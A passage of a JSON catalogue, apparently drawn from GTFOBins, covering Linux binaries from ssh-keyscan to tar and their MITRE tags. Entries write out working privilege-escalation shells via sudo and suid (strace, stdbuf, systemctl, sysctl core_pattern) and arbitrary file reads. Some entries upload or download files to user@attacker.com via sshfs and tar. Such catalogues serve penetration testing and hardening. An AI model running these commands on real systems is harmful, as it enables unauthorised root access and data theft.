part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:suid","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ssh-keyscan:file-read:0:unprivileged","toolId":"gtfo:ssh-keyscan","toolName":"ssh-keyscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:command:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:command:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:download:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:shell:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:shell:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:upload:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:sudo","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:suid","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:unprivileged","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshuttle:shell:0:sudo","toolId":"gtfo:sshuttle","toolName":"sshuttle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo sshuttle -r x --ssh-cmd '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' localhost","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:sudo","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:suid","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh -- -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:unprivileged","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:sudo","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:suid","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:unprivileged","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:file-write:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:file-write:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:suid","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:sudo","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:suid","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:unprivileged","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:su:shell:0:sudo","toolId":"gtfo:su","toolName":"su","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"su -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/su/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sudo:shell:0:sudo","toolId":"gtfo:sudo","toolName":"sudo","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo /bin/sh","description":"The invocation is actually `sudo sudo ...`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sudo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:command:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:command:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:unprivileged","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:unprivileged","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:1:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\nSYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-resolve:inherit:0:sudo","toolId":"gtfo:systemd-resolve","toolName":"systemd-resolve","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemd-resolve --status","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:command:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"systemd-run /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:shell:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -S","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:shell:1:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -t /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:sudo","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:suid","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:unprivileged","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:sudo","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:suid","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:unprivileged","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tailscale:upload:0:sudo","toolId":"gtfo:tailscale","toolName":"tailscale","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tailscale serve --http=12345 /path/to/input-file","description":"The URL is reachable by any host of the same Tailnet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tailscale/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:download:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 